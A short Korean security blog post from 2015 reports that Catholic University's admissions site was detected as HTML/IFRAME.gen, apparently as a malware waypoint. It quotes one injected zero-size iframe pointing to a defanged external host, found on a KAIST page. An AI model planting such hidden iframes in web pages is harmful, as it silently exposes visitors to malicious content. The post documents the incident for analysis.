annyoung

가톨릭대학교 입학처 악성코드 경유지로 이용? 본문

분석생활

가톨릭대학교 입학처 악성코드 경유지로 이용?

nopsled 2015. 11. 25. 03:09





2015-11-24 03:18:29http://ipsi.catholic.ac.kr/main/index.asp59835DC727054D056A8E0E3914989598211.174.52.78KRHTML/IFRAME.gen


악성코드 경유지로 이용된 건지는 확실치는 않으나 HTML/IFRAME generate로 탐지가 되었다. 이유가 있으니 탐지했겠지. 샘플 입수는 못했으므로 자세한 내용은 없음..



추가내용))

가톨릭대학교 말고도 카이스트 twilight 홈페이지에서도 침해사고(?)의 흔적이 보인다.


<iframe src="hxxp://ro521.com/test.htm" width=0 height=0></iframe> 

아마 가톨릭대학교 입학처도 ro521.com이 iframe 박혀 있었던 것으로 추정된다.

Comments